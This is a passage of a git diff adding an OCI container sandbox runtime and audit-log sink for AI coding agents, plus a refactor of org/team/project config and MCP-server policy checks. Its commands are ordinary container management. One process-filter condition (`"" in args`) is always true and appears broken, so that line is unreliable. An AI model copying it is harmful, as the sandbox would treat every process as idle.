scc_cli.utils.locks import DEFAULT_TIMEOUT, file_lock + + +@dataclass(frozen=True) +class LocalAuditEventSink: + """Persist audit events as append-only JSONL records on local disk.""" + + audit_path: Path = config.LAUNCH_AUDIT_FILE + lock_path: Path = config.LAUNCH_AUDIT_LOCK_FILE + lock_timeout: float = DEFAULT_TIMEOUT + + def append(self, event: AuditEvent) -> None: + """Append one structured event to the local JSONL sink.""" + self.audit_path.parent.mkdir(parents=True, exist_ok=True) + line = serialize_audit_event(event) + with file_lock(self.lock_path, timeout=self.lock_timeout): + with self.audit_path.open("a", encoding="utf-8") as handle: + handle.write(line) + handle.write("\n") + handle.flush() + os.fsync(handle.fileno()) + + def describe_destination(self) -> str: + """Return the on-disk audit file path.""" + return str(self.audit_path) + + +def serialize_audit_event(event: AuditEvent) -> str: + """Return a compact JSON line for one audit event.""" + payload = asdict(event) + payload["severity"] = event.severity.value + payload["occurred_at"] = event.occurred_at.isoformat() + return json.dumps(payload, separators=(",", ":"), sort_keys=True) diff --git a/src/scc_cli/adapters/oci_sandbox_runtime.py b/src/scc_cli/adapters/oci_sandbox_runtime.py new file mode 100644 index 0000000..f6b9c83 --- /dev/null +++ b/src/scc_cli/adapters/oci_sandbox_runtime.py @@ -0,0 +1,710 @@ +"""Plain OCI sandbox runtime adapter for SandboxRuntime port. + +Uses standard ``docker create`` / ``docker start`` / ``docker exec`` +commands instead of Docker Desktop's ``docker sandbox run``, making SCC +work on Docker Engine, OrbStack, Colima, and any OCI-compatible runtime. +""" + +from __future__ import annotations + +import hashlib +import os +import shlex +import subprocess +import tempfile +from dataclasses import dataclass +from pathlib import Path + +from scc_cli.adapters.egress_topology import NetworkTopologyManager +from scc_cli.core.destination_registry import destination_sets_to_allow_rules +from scc_cli.core.egress_policy import build_egress_plan, compile_squid_acl +from scc_cli.core.enums import NetworkPolicy +from scc_cli.core.errors import ( + DockerDaemonNotRunningError, + DockerNotFoundError, + ExistingSandboxConflictError, + SandboxLaunchError, +) +from scc_cli.core.network_policy import collect_proxy_env +from scc_cli.ports.models import ( + SandboxConflict, + SandboxHandle, + SandboxSpec, + SandboxState, + SandboxStatus, +) +from scc_cli.ports.runtime_probe import RuntimeProbe + +# Timeouts for subprocess calls (seconds) +_CREATE_TIMEOUT = 60 +_START_TIMEOUT = 30 +_INSPECT_TIMEOUT = 10 +_DEFAULT_TIMEOUT = 15 + +# Label used to identify OCI-backend containers +_OCI_LABEL = "scc.backend=oci" + +# Claude-specific defaults for OCI sandbox runtime +_CLAUDE_AGENT_NAME = "claude" +_CLAUDE_DATA_VOLUME = "docker-claude-sandbox-data" + +# Agent home inside the container +_AGENT_HOME = "/home/agent" + +# Agent UID inside the container +_AGENT_UID = 1000 + +# Known auth file names per provider config dir (D039 permission targets) +_AUTH_FILES: dict[str, tuple[str, ...]] = { + ".claude": (".credentials.json", ".claude.json"), + ".codex": ("auth.json",), +} + +_HOME_LEVEL_AUTH_LINKS: dict[str, tuple[tuple[str, str], ...]] = { + ".claude": ((".claude.json", f"{_AGENT_HOME}/.claude.json"),), +} + + +@dataclass(frozen=True) +class _ContainerProcess: + """One process observed inside a sandbox container.""" + + stat: str + command: str + args: str + + +def _container_name(workspace: Path, provider_id: str = "") -> str: + """Derive a deterministic container name from a workspace path and provider. + + When ``provider_id`` is non-empty the hash input changes, producing a + different container name per provider for the same workspace. This + prevents coexistence collisions when two providers target the same + directory. + """ + hash_input = f"{provider_id}:{workspace}" if provider_id else str(workspace) + digest = hashlib.sha256(hash_input.encode()).hexdigest()[:12] + return f"scc-oci-{digest}" + + +def _run_docker( + args: list[str], + *, + timeout: int = _DEFAULT_TIMEOUT, + check: bool = True, +) -> subprocess.CompletedProcess[str]: + """Run a ``docker`` subprocess with standard error handling. + + Raises: + SandboxLaunchError: on non-zero exit or timeout. + """ + cmd = ["docker", *args] + try: + return subprocess.run( + cmd, + capture_output=True, + text=True, + timeout=timeout, + check=check, + ) + except subprocess.TimeoutExpired as exc: + raise SandboxLaunchError( + user_message=f"Docker command timed out after {timeout}s", + command=" ".join(cmd), + stderr=str(exc), + ) from exc + except subprocess.CalledProcessError as exc: + raise SandboxLaunchError( + user_message="Docker command failed", + command=" ".join(cmd), + stderr=exc.stderr or "", + ) from exc + + +def _find_existing_container(container_name: str) -> tuple[str, SandboxState] | None: + """Return existing container id + state for an exact name match, if any.""" + result = _run_docker( + [ + "ps", + "-a", + "--filter", + f"name=^{container_name}$", + "--format", + "{{.ID}}\t{{.Status}}", + ], + timeout=_DEFAULT_TIMEOUT, + check=False, + ) + line = next((raw.strip() for raw in result.stdout.splitlines() if raw.strip()), "") + if "\t" not in line: + return None + + container_id, raw_status = line.split("\t", 1) + status = raw_status.strip().lower() + if status.startswith("up") or status.startswith("restarting") or status.startswith("paused"): + state = SandboxState.RUNNING + elif status.startswith("created"): + state = SandboxState.CREATED + elif status.startswith("exited") or status.startswith("dead"): + state = SandboxState.STOPPED + else: + state = SandboxState.UNKNOWN + return (container_id.strip(), state) + + +def _is_idle_keepalive_container(container_id: str) -> bool: + """Return True when the container only runs the keepalive ``sleep`` process.""" + processes = _list_container_processes(container_id) + if not processes: + return False + + saw_keepalive = False + for process in processes: + if _is_ignorable_process(process): + if _is_keepalive_process(process): + saw_keepalive = True + continue + if not _is_keepalive_process(process): + return False + saw_keepalive = True + return saw_keepalive + + +def _list_container_processes(container_id: str) -> list[_ContainerProcess]: + """Return parsed container processes from ``ps -eo stat=,comm=,args=``.""" + result = _run_docker( + ["exec", container_id, "ps", "-eo", "stat=,comm=,args="], + timeout=_INSPECT_TIMEOUT, + check=False, + ) + processes: list[_ContainerProcess] = [] + for line in result.stdout.splitlines(): + line = line.strip() + if not line: + continue + parts = line.split(None, 2) + if len(parts) < 2: + continue + stat = parts[0] + command = parts[1] + args = parts[2] if len(parts) > 2 else command + processes.append( + _ContainerProcess( + stat=stat, + command=command, + args=args, + ) + ) + return processes + + +def _active_process_summary(container_id: str) -> str | None: + """Return the first non-keepalive process summary, if any.""" + for process in _list_container_processes(container_id): + if _is_ignorable_process(process): + continue + return process.args + return None + + +def _is_keepalive_process(process: _ContainerProcess) -> bool: + """Return True for the container keepalive command.""" + command = process.command.lower() + args = process.args.lower() + return command == "sleep" or args.startswith("sleep ") + + +def _is_ignorable_process(process: _ContainerProcess) -> bool: + """Return True for processes that should not count as active agent work.""" + if process.command.lower() == "ps": + return True + if _is_keepalive_process(process): + return True + + stat = process.stat.upper() + args = process.args.lower() + return stat.startswith("Z") or "" in args + + +def _remove_conflicting_container(container_name: str, container_id: str) -> None: + """Best-effort cleanup for a conflicting deterministic OCI sandbox.""" + # If an older enforced-egress run left sidecar/network state behind, + # tear it down before recreating the sandbox with the same session id. + NetworkTopologyManager(session_id=container_name).teardown() + _run_docker(["rm", "-f", container_id], timeout=_DEFAULT_TIMEOUT, check=False) + + +def _ensure_workspace_config_excluded( + container_id: str, + workspace_path: str, + config_dir_name: str, +) -> None: + """Create a workspace config dir and add it to .git/info/exclude. + + D041: project-scoped provider config (e.g. ``.codex/``) lives in the + workspace bind mount. To prevent dirtying the host repo, the config + directory name is appended to ``.git/info/exclude`` (a local Git + exclusion that is never tracked) rather than ``.gitignore`` (which + would itself create a tracked-file mutation). + + Best-effort: failures here are non-fatal — the agent session can + still launch even if the exclude write fails (e.g. workspace is not + a git repo). + """ + # Ensure the config directory exists inside the container workspace + config_dir = f"{workspace_path}/{config_dir_name}" + _run_docker( + ["exec", container_id, "mkdir", "-p", config_dir], + timeout=_DEFAULT_TIMEOUT, + check=False, + ) + + # Append to the effective Git exclude file if not already present. + # Use Git's own path resolution so regular repos and linked worktrees + # both write to the exclude file Git actually consults. + workspace_quoted = shlex.quote(workspace_path) + config_dir_quoted = shlex.quote(config_dir_name) + shell_cmd = ( + f"exclude_path=$(git -C {workspace_quoted} rev-parse --git-path info/exclude 2>/dev/null) " + "|| exit 0; " + 'mkdir -p "$(dirname "$exclude_path")"; ' + f'grep -qxF {config_dir_quoted} "$exclude_path" 2>/dev/null ' + f'|| echo {config_dir_quoted} >> "$exclude_path"' + ) + _run_docker( + ["exec", container_id, "sh", "-c", shell_cmd], + timeout=_DEFAULT_TIMEOUT, + check=False, + ) + + +def _normalize_provider_permissions( + container_id: str, + config_dir: str, +) -> None: + """Normalise ownership and permissions on the provider state directory. + + D039: Build-time Dockerfile permissions only apply when the volume is + first populated. Runtime normalisation ensures that provider config + dirs are always 0700 and auth files are always 0600, owned by the + agent uid, regardless of volume history. + + Best-effort: failures are non-fatal — the agent session can still + launch even if a ``chmod``/``chown`` fails (e.g. auth file does not + exist yet on a fresh volume). + """ + config_dirname = config_dir if config_dir else ".claude" + config_path = f"{_AGENT_HOME}/{config_dirname}" + + # 1. chown + chmod the provider config directory itself + _run_docker( + [ + "exec", + container_id, + "sh", + "-c", + f"chown {_AGENT_UID}:{_AGENT_UID} {config_path} && chmod 0700 {config_path}", + ], + timeout=_DEFAULT_TIMEOUT, + check=False, + ) + + # 2. chmod known auth files to 0600 (if they exist) + auth_files = _AUTH_FILES.get(config_dirname, ()) + for auth_file in auth_files: + auth_path = f"{config_path}/{auth_file}" + _run_docker( + [ + "exec", + container_id, + "sh", + "-c", + ( + f"test -f {auth_path} && " + f"chown {_AGENT_UID}:{_AGENT_UID} {auth_path} && " + f"chmod 0600 {auth_path}" + ), + ], + timeout=_DEFAULT_TIMEOUT, + check=False, + ) + + +def _project_home_level_auth_files( + container_id: str, + config_dir: str, +) -> None: + """Project auth files from mounted provider state into the expected HOME path.""" + config_dirname = config_dir if config_dir else ".claude" + projections = _HOME_LEVEL_AUTH_LINKS.get(config_dirname, ()) + for source_name, target_path in projections: + source_path = f"{_AGENT_HOME}/{config_dirname}/{source_name}" + _run_docker( + [ + "exec", + container_id, + "sh", + "-c", + ( + f"test -f {source_path} && " + f"ln -sfn {source_path} {target_path} && " + f"chown -h {_AGENT_UID}:{_AGENT_UID} {target_path}" + ), + ], + timeout=_DEFAULT_TIMEOUT, + check=False, + ) + + +class OciSandboxRuntime: + """SandboxRuntime backed by plain OCI container commands. + + Unlike :class:`DockerSandboxRuntime`, this adapter: + + * Does **not** require Docker Desktop's sandbox feature. + * Actually consumes ``spec.image`` for the container image. + * Uses volume mounts at container creation time for credential + persistence instead of Desktop's symlink pattern. + """ + + def __init__(self, probe: RuntimeProbe) -> None: + self._probe = probe + self._topology: NetworkTopologyManager | None = None + + # ── SandboxRuntime protocol ────────────────────────────────────────── + + def ensure_available(self) -> None: + """Probe the runtime and raise if OCI container support is missing.""" + info = self._probe.probe() + + if info.version is None and not info.daemon_reachable: + raise DockerNotFoundError() + + if not info.daemon_reachable: + raise DockerDaemonNotRunningError() + + if not info.supports_oci: + raise DockerNotFoundError( + user_message="Docker runtime does not support OCI containers", + suggested_action=( + "Install Docker Engine, OrbStack, Colima, or another " + "OCI-compatible container runtime" + ), + ) + + def detect_launch_conflict(self, spec: SandboxSpec) -> SandboxConflict | None: + """Report a live conflict that needs an explicit operator decision. + + Stopped, created, and idle keepalive containers are intentionally + excluded: ``run()`` already self-heals them without prompting. + """ + if spec.force_new: + return None + + container_name = _container_name(spec.workspace_mount.source, spec.provider_id) + existing = _find_existing_container(container_name) + if existing is None: + return None + + existing_id, existing_state = existing + if existing_state in {SandboxState.CREATED, SandboxState.STOPPED}: + return None + if existing_state is SandboxState.RUNNING: + if _is_idle_keepalive_container(existing_id): + return None + return SandboxConflict( + handle=SandboxHandle(sandbox_id=existing_id, name=container_name), + state=existing_state, + process_summary=_active_process_summary(existing_id), + ) + + return SandboxConflict( + handle=SandboxHandle(sandbox_id=existing_id, name=container_name), + state=existing_state, + process_summary=None, + ) + + def run(self, spec: SandboxSpec) -> SandboxHandle: + """Create, start, and exec into an OCI container. + + The method replaces the current process via :func:`os.execvp` for + the final ``docker exec`` call, so it **does not return** in normal + operation. The :class:`SandboxHandle` return is provided for the + protocol signature and for testing with a mocked ``os.execvp``. + """ + container_name = _container_name(spec.workspace_mount.source, spec.provider_id) + + existing = _find_existing_container(container_name) + if existing is not None: + existing_id, existing_state = existing + if spec.force_new: + _remove_conflicting_container(container_name, existing_id) + elif existing_state in {SandboxState.CREATED, SandboxState.STOPPED}: + _remove_conflicting_container(container_name, existing_id) + elif existing_state is SandboxState.RUNNING and _is_idle_keepalive_container( + existing_id + ): + _remove_conflicting_container(container_name, existing_id) + else: + raise ExistingSandboxConflictError(container_name=container_name) + + # -- Set up egress topology for enforced mode ---------------------- + network_name: str | None = None + proxy_env: dict[str, str] = {} + + if spec.network_policy == NetworkPolicy.WEB_EGRESS_ENFORCED.value: + allow_rules = destination_sets_to_allow_rules(spec.destination_sets) + plan = build_egress_plan( + NetworkPolicy.WEB_EGRESS_ENFORCED, + destination_sets=spec.destination_sets, + egress_rules=allow_rules, + ) + acl_config = compile_squid_acl(plan) + self._topology = NetworkTopologyManager(session_id=container_name) + topo_info = self._topology.setup(acl_config) + network_name = topo_info.network_name + proxy_env = { + "HTTP_PROXY": topo_info.proxy_endpoint, + "HTTPS_PROXY": topo_info.proxy_endpoint, + "NO_PROXY": "", + } + # Also forward host proxy env for parity with DockerSandboxRuntime + proxy_env.update(collect_proxy_env()) + + # -- Build docker create command ------------------------------------ + create_cmd = self._build_create_cmd( + spec, + container_name, + network_name=network_name, + proxy_env=proxy_env, + ) + result = _run_docker(create_cmd, timeout=_CREATE_TIMEOUT) + container_id = result.stdout.strip() + + # -- Start the container ------------------------------------------- + _run_docker(["start", container_id], timeout=_START_TIMEOUT) + + # -- D039: normalise provider state permissions -------------------- + _normalize_provider_permissions(container_id, spec.config_dir) + _project_home_level_auth_files(container_id, spec.config_dir) + + # -- Inject agent settings via docker cp if needed ----------------- + if spec.agent_settings is not None: + self._inject_settings(container_id, spec) + + # -- Build docker exec command and hand off ------------------------ + exec_cmd = self._build_exec_cmd(spec, container_id) + os.execvp("docker", ["docker", *exec_cmd]) + + # execvp replaces the process; the lines below execute only when + # os.execvp is mocked in tests. + return SandboxHandle(sandbox_id=container_id, name=container_name) + + def resume(self, handle: SandboxHandle) -> None: + """Start a previously stopped container.""" + _run_docker(["start", handle.sandbox_id], timeout=_START_TIMEOUT) + + def stop(self, handle: SandboxHandle) -> None: + """Stop a running container.""" + _run_docker(["stop", handle.sandbox_id], timeout=_DEFAULT_TIMEOUT) + self._teardown_topology() + + def remove(self, handle: SandboxHandle) -> None: + """Force-remove a container.""" + _run_docker(["rm", "-f", handle.sandbox_id], timeout=_DEFAULT_TIMEOUT) + self._teardown_topology() + + def list_running(self) -> list[SandboxHandle]: + """List containers started by this backend.""" + result = _run_docker( + [ + "ps", + "--filter", + f"label={_OCI_LABEL}", + "--format", + "{{.ID}}\t{{.Names}}", + ], + timeout=_DEFAULT_TIMEOUT, + ) + handles: list[SandboxHandle] = [] + for line in result.stdout.strip().splitlines(): + if not line.strip(): + continue + parts = line.split("\t", 1) + cid = parts[0].strip() + cname = parts[1].strip() if len(parts) > 1 else None + handles.append(SandboxHandle(sandbox_id=cid, name=cname)) + return handles + + def status(self, handle: SandboxHandle) -> SandboxStatus: + """Inspect container state and map to SandboxState.""" + try: + result = subprocess.run( + [ + "docker", + "inspect", + "--format", + "{{.State.Status}}", + handle.sandbox_id, + ], + capture_output=True, + text=True, + timeout=_INSPECT_TIMEOUT, + check=False, + ) + except subprocess.TimeoutExpired: + return SandboxStatus(state=SandboxState.UNKNOWN) + + if result.returncode != 0: + return SandboxStatus(state=SandboxState.UNKNOWN) + + raw = result.stdout.strip().lower() + state_map: dict[str, SandboxState] = { + "created": SandboxState.CREATED, + "running": SandboxState.RUNNING, + "exited": SandboxState.STOPPED, + "dead": SandboxState.STOPPED, + "paused": SandboxState.RUNNING, + "restarting": SandboxState.RUNNING, + } + return SandboxStatus(state=state_map.get(raw, SandboxState.UNKNOWN)) + + # ── Private helpers ────────────────────────────────────────────────── + + @staticmethod + def _build_create_cmd( + spec: SandboxSpec, + container_name: str, + *, + network_name: str | None = None, + proxy_env: dict[str, str] | None = None, + ) -> list[str]: + """Assemble the ``docker create`` argument list.""" + # Resolve data volume and config dir, falling back to Claude defaults. + volume_name = spec.data_volume if spec.data_volume else _CLAUDE_DATA_VOLUME + config_dirname = spec.config_dir if spec.config_dir else ".claude" + + cmd: list[str] = [ + "create", + "--name", + container_name, + # Override image entrypoint so the keepalive command is stable + # regardless of what the image declares as ENTRYPOINT. + "--entrypoint", + "/bin/bash", + # Workspace mount + "-v", + f"{spec.workspace_mount.source}:{spec.workspace_mount.target}", + # Credential volume mount + "-v", + f"{volume_name}:{_AGENT_HOME}/{config_dirname}", + # Working directory + "-w", + str(spec.workdir), + # OCI-backend label + "--label", + _OCI_LABEL, + ] + + # -- Network policy enforcement ----------------------------------- + if spec.network_policy == NetworkPolicy.LOCKED_DOWN_WEB.value: + cmd.extend(["--network", "none"]) + elif network_name is not None: + cmd.extend(["--network", network_name]) + + # Environment variables + for key, value in spec.env.items(): + cmd.extend(["-e", f"{key}={value}"]) + + # Proxy env vars for enforced egress mode + if proxy_env: + for key, value in proxy_env.items(): + cmd.extend(["-e", f"{key}={value}"]) + + # Extra mounts + for mount in spec.extra_mounts: + mount_str = f"{mount.source}:{mount.target}" + if mount.read_only: + mount_str += ":ro" + cmd.extend(["-v", mount_str]) + + # Image — this is the key difference from DockerSandboxRuntime + cmd.append(spec.image) + + # Keep container alive with a blocking shell command. The entrypoint + # is already overridden above, so only pass the shell arguments here. + cmd.extend(["-c", "sleep infinity"]) + + return cmd + + def _teardown_topology(self) -> None: + """Tear down egress topology if one was set up.""" + if self._topology is not None: + self._topology.teardown() + self._topology = None + + @staticmethod + def _build_exec_cmd(spec: SandboxSpec, container_id: str) -> list[str]: + """Assemble the ``docker exec`` argument list.""" + cmd: list[str] = [ + "exec", + "-it", + "-w", + str(spec.workdir), + container_id, + ] + + if spec.agent_argv: + cmd.extend(list(spec.agent_argv)) + else: + cmd.extend([_CLAUDE_AGENT_NAME, "--dangerously-skip-permissions"]) + + if spec.continue_session: + cmd.append("-c") + + return cmd + + @staticmethod + def _inject_settings(container_id: str, spec: SandboxSpec) -> None: + """Write pre-rendered agent settings into the container via ``docker cp``. + + The runtime is format-agnostic — ``rendered_bytes`` are written + verbatim. The runner (``AgentRunner.build_settings``) owns + serialisation (JSON for Claude, TOML for Codex, etc.). See D035. + + For workspace-scoped settings (D041, e.g. Codex project config), + the parent directory is created inside the container and the config + dir is added to ``.git/info/exclude`` so that workspace bind-mount + writes do not dirty the host repository. + """ + if spec.agent_settings is None: + return # pragma: no cover + + target_path = str(spec.agent_settings.path) + + # D041: ensure workspace-scoped config dir exists and is git-excluded. + workspace_root = Path(spec.workdir) + try: + rel = spec.agent_settings.path.relative_to(workspace_root) + except ValueError: + rel = None + + if rel is not None and rel.parts: + # Derive the top-level config dir name relative to the logical + # workspace root, not the broader mount root used for worktree + # support. + config_dir_name = rel.parts[0] # e.g. ".codex" + _ensure_workspace_config_excluded(container_id, str(workspace_root), config_dir_name) + + suffix = spec.agent_settings.suffix or ".json" + with tempfile.NamedTemporaryFile(mode="wb", suffix=suffix, delete=False) as tmp: + tmp.write(spec.agent_settings.rendered_bytes) + tmp_path = tmp.name + + try: + _run_docker( + ["cp", tmp_path, f"{container_id}:{target_path}"], + timeout=_DEFAULT_TIMEOUT, + ) + finally: + Path(tmp_path).unlink(missing_ok=True) diff --git a/src/scc_cli/adapters/personal_profile_service_local.py b/src/scc_cli/adapters/personal_profile_service_local.py index 895202e..f95927d 100644 --- a/src/scc_cli/adapters/personal_profile_service_local.py +++ b/src/scc_cli/adapters/personal_profile_service_local.py @@ -7,6 +7,7 @@ from scc_cli.core import personal_profiles from scc_cli.core.personal_profiles import PersonalProfile +from scc_cli.marketplace.managed import load_managed_state from scc_cli.ports.personal_profile_service import PersonalProfileService @@ -38,7 +39,9 @@ def merge_personal_settings( existing: dict[str, Any], personal: dict[str, Any], ) -> dict[str, Any]: - return personal_profiles.merge_personal_settings(workspace, existing, personal) + return personal_profiles.merge_personal_settings( + workspace, existing, personal, managed_state_loader=load_managed_state + ) def merge_personal_mcp( self, existing: dict[str, Any], personal: dict[str, Any] diff --git a/src/scc_cli/application/compute_effective_config.py b/src/scc_cli/application/compute_effective_config.py index 21209a4..03d4637 100644 --- a/src/scc_cli/application/compute_effective_config.py +++ b/src/scc_cli/application/compute_effective_config.py @@ -11,6 +11,7 @@ from scc_cli import config as config_module from scc_cli.core.enums import MCPServerType, NetworkPolicy, RequestSource, TargetType from scc_cli.core.network_policy import is_more_or_equal_restrictive +from scc_cli.ports.config_models import NormalizedOrgConfig, NormalizedTeamConfig, SessionSettings if TYPE_CHECKING: pass @@ -233,7 +234,7 @@ def record_network_policy_decision( def validate_stdio_server( server: dict[str, Any], - org_config: dict[str, Any], + org_config: dict[str, Any] | NormalizedOrgConfig, ) -> StdioValidationResult: """Validate a stdio MCP server configuration against org security policy. @@ -252,18 +253,20 @@ def validate_stdio_server( Args: server: MCP server dict with 'name', 'type', 'command' fields - org_config: Organization config dict + org_config: Organization config (NormalizedOrgConfig or legacy dict) Returns: StdioValidationResult with blocked=True/False, reason, and warnings """ import os + if isinstance(org_config, dict): + org_config = NormalizedOrgConfig.from_dict(org_config) + command = server.get("command", "") warnings: list[str] = [] - security = org_config.get("security", {}) - if not security.get("allow_stdio_mcp", False): + if not org_config.security.allow_stdio_mcp: return StdioValidationResult( blocked=True, reason="stdio MCP disabled by org policy", @@ -275,7 +278,7 @@ def validate_stdio_server( reason="stdio command must be absolute path", ) - prefixes = security.get("allowed_stdio_prefixes", []) + prefixes = org_config.security.allowed_stdio_prefixes if prefixes: try: resolved = os.path.realpath(command) @@ -322,48 +325,49 @@ def _extract_domain(url: str) -> str: return parsed.netloc or url -def is_team_delegated_for_plugins(org_config: dict[str, Any], team_name: str | None) -> bool: +def is_team_delegated_for_plugins( + org_config: dict[str, Any] | NormalizedOrgConfig, team_name: str | None +) -> bool: """Check whether team is allowed to add additional plugins.""" if not team_name: return False - delegation = org_config.get("delegation", {}) - teams_delegation = delegation.get("teams", {}) - allowed_patterns = teams_delegation.get("allow_additional_plugins", []) + if isinstance(org_config, dict): + org_config = NormalizedOrgConfig.from_dict(org_config) - return matches_blocked(team_name, allowed_patterns) is not None + allowed_patterns = org_config.delegation.teams.allow_additional_plugins + return matches_blocked(team_name, list(allowed_patterns)) is not None -def is_team_delegated_for_mcp(org_config: dict[str, Any], team_name: str | None) -> bool: +def is_team_delegated_for_mcp( + org_config: dict[str, Any] | NormalizedOrgConfig, team_name: str | None +) -> bool: """Check whether team is allowed to add MCP servers.""" if not team_name: return False - delegation = org_config.get("delegation", {}) - teams_delegation = delegation.get("teams", {}) - allowed_patterns = teams_delegation.get("allow_additional_mcp_servers", []) + if isinstance(org_config, dict): + org_config = NormalizedOrgConfig.from_dict(org_config) - return matches_blocked(team_name, allowed_patterns) is not None + allowed_patterns = org_config.delegation.teams.allow_additional_mcp_servers + return matches_blocked(team_name, list(allowed_patterns)) is not None -def is_project_delegated(org_config: dict[str, Any], team_name: str | None) -> tuple[bool, str]: +def is_project_delegated( + org_config: dict[str, Any] | NormalizedOrgConfig, team_name: str | None +) -> tuple[bool, str]: """Check whether project-level additions are allowed.""" if not team_name: return (False, "No team specified") - delegation = org_config.get("delegation", {}) - projects_delegation = delegation.get("projects", {}) - org_allows = projects_delegation.get("inherit_team_delegation", False) + if isinstance(org_config, dict): + org_config = NormalizedOrgConfig.from_dict(org_config) - if not org_allows: + if not org_config.delegation.projects.inherit_team_delegation: return (False, "Org disabled project delegation (inherit_team_delegation: false)") - profiles = org_config.get("profiles", {}) - team_config = profiles.get(team_name, {}) - team_delegation = team_config.get("delegation", {}) - team_allows = team_delegation.get("allow_project_overrides", False) - - if not team_allows: + team_profile = org_config.profiles.get(team_name) + if team_profile is None or not team_profile.delegation.allow_project_overrides: return ( False, f"Team '{team_name}' disabled project overrides (allow_project_overrides: false)", @@ -372,111 +376,137 @@ def is_project_delegated(org_config: dict[str, Any], team_name: str | None) -> t return (True, "") -def compute_effective_config( - org_config: dict[str, Any], +def _merge_team_mcp_servers( + result: EffectiveConfig, + *, + team_config: NormalizedTeamConfig | None, team_name: str | None, - project_config: dict[str, Any] | None = None, - workspace_path: str | Path | None = None, -) -> EffectiveConfig: - """Compute effective configuration by merging org defaults → team → project.""" - if workspace_path is not None: - project_config = config_module.read_project_config(workspace_path) + org_config: NormalizedOrgConfig, + blocked_mcp_servers: list[str], + allowed_mcp_servers: list[str] | None, + network_policy_source: str | None, +) -> None: + """Merge team MCP servers into the effective config.""" + team_mcp_servers_raw: list[dict[str, Any]] = [] + if team_config: + for mcp in team_config.additional_mcp_servers: + server_dict: dict[str, Any] = {"name": mcp.name, "type": mcp.type} + if mcp.url: + server_dict["url"] = mcp.url + if mcp.command: + server_dict["command"] = mcp.command + if mcp.args: + server_dict["args"] = mcp.args + if mcp.env: + server_dict["env"] = mcp.env + if mcp.headers: + server_dict["headers"] = mcp.headers + team_mcp_servers_raw.append(server_dict) - result = EffectiveConfig() + team_delegated_mcp = is_team_delegated_for_mcp(org_config, team_name) - security = org_config.get("security", {}) - blocked_plugins = security.get("blocked_plugins", []) - blocked_mcp_servers = security.get("blocked_mcp_servers", []) + for server_dict in team_mcp_servers_raw: + server_name = server_dict.get("name", "") + server_url = server_dict.get("url", "") - defaults = org_config.get("defaults", {}) - default_plugins = defaults.get("enabled_plugins", []) - disabled_plugins = defaults.get("disabled_plugins", []) - allowed_plugins = defaults.get("allowed_plugins") - allowed_mcp_servers = defaults.get("allowed_mcp_servers") - default_network_policy = defaults.get("network_policy") - default_session = defaults.get("session", {}) + blocked_by = match_blocked_mcp(server_dict, blocked_mcp_servers) - for plugin in default_plugins: - blocked_by = matches_blocked_plugin(plugin, blocked_plugins) if blocked_by: result.blocked_items.append( - BlockedItem(item=plugin, blocked_by=blocked_by, source="org.security") + BlockedItem( + item=server_name or server_url, + blocked_by=blocked_by, + source="org.security", + target_type=TargetType.MCP_SERVER, + ) ) continue - if matches_blocked_plugin(plugin, disabled_plugins): + if not team_delegated_mcp: + result.denied_additions.append( + DelegationDenied( + item=server_name, + requested_by=RequestSource.TEAM, + reason=f"Team '{team_name}' not allowed to add MCP servers", + target_type=TargetType.MCP_SERVER, + ) + ) continue - result.plugins.add(plugin) - result.decisions.append( - ConfigDecision( - field="plugins", - value=plugin, - reason="Included in organization defaults", - source="org.defaults", + if not is_mcp_allowed(server_dict, allowed_mcp_servers): + result.denied_additions.append( + DelegationDenied( + item=server_name or server_url, + requested_by=RequestSource.TEAM, + reason="MCP server not allowed by defaults.allowed_mcp_servers", + target_type=TargetType.MCP_SERVER, + ) ) - ) - - network_policy_source: str | None = None - if default_network_policy: - result.network_policy = default_network_policy - network_policy_source = "org.defaults" - record_network_policy_decision( - result, - policy=default_network_policy, - reason="Organization default network policy", - source="org.defaults", - ) + continue - if default_session.get("timeout_hours") is not None: - result.session_config.timeout_hours = default_session["timeout_hours"] - result.decisions.append( - ConfigDecision( - field="session.timeout_hours", - value=default_session["timeout_hours"], - reason="Organization default session timeout", - source="org.defaults", + if result.network_policy == NetworkPolicy.LOCKED_DOWN_WEB.value and is_network_mcp( + server_dict + ): + result.blocked_items.append( + BlockedItem( + item=server_name or server_url, + blocked_by="network_policy=locked-down-web", + source=network_policy_source or "org.defaults", + target_type=TargetType.MCP_SERVER, + ) ) + continue + + if server_dict.get("type") == MCPServerType.STDIO: + stdio_result = validate_stdio_server(server_dict, org_config) + if stdio_result.blocked: + result.blocked_items.append( + BlockedItem( + item=server_name, + blocked_by=stdio_result.reason, + source="org.security", + target_type=TargetType.MCP_SERVER, + ) + ) + continue + + mcp_server = MCPServer( + name=server_name, + type=server_dict.get("type", MCPServerType.SSE), + url=server_url or None, + command=server_dict.get("command"), + args=server_dict.get("args"), + env=server_dict.get("env"), + headers=server_dict.get("headers"), ) - if default_session.get("auto_resume") is not None: - result.session_config.auto_resume = default_session["auto_resume"] + result.mcp_servers.append(mcp_server) result.decisions.append( ConfigDecision( - field="session.auto_resume", - value=default_session["auto_resume"], - reason="Organization default session auto-resume", - source="org.defaults", + field="mcp_servers", + value=server_name, + reason=f"Added by team profile '{team_name}'", + source=f"team.{team_name}", ) ) - profiles = org_config.get("profiles", {}) - team_config = profiles.get(team_name, {}) - - team_network_policy = team_config.get("network_policy") - if team_network_policy: - if result.network_policy is None: - result.network_policy = team_network_policy - network_policy_source = f"team.{team_name}" - record_network_policy_decision( - result, - policy=team_network_policy, - reason=f"Overridden by team profile '{team_name}'", - source=f"team.{team_name}", - ) - elif is_more_or_equal_restrictive(team_network_policy, result.network_policy): - result.network_policy = team_network_policy - network_policy_source = f"team.{team_name}" - record_network_policy_decision( - result, - policy=team_network_policy, - reason=f"Overridden by team profile '{team_name}'", - source=f"team.{team_name}", - ) - team_plugins = team_config.get("additional_plugins", []) - team_delegated_plugins = is_team_delegated_for_plugins(org_config, team_name) +def _merge_project_config( + result: EffectiveConfig, + *, + project_config: dict[str, Any], + org_config: NormalizedOrgConfig, + team_name: str | None, + blocked_plugins: list[str], + blocked_mcp_servers: list[str], + allowed_plugins: list[str] | None, + allowed_mcp_servers: list[str] | None, + network_policy_source: str | None, +) -> None: + """Merge project-level config into the effective config.""" + project_delegated, delegation_reason = is_project_delegated(org_config, team_name) - for plugin in team_plugins: + project_plugins = project_config.get("additional_plugins", []) + for plugin in project_plugins: blocked_by = matches_blocked_plugin(plugin, blocked_plugins) if blocked_by: result.blocked_items.append( @@ -484,12 +514,12 @@ def compute_effective_config( ) continue - if not team_delegated_plugins: + if not project_delegated: result.denied_additions.append( DelegationDenied( item=plugin, - requested_by=RequestSource.TEAM, - reason=f"Team '{team_name}' not 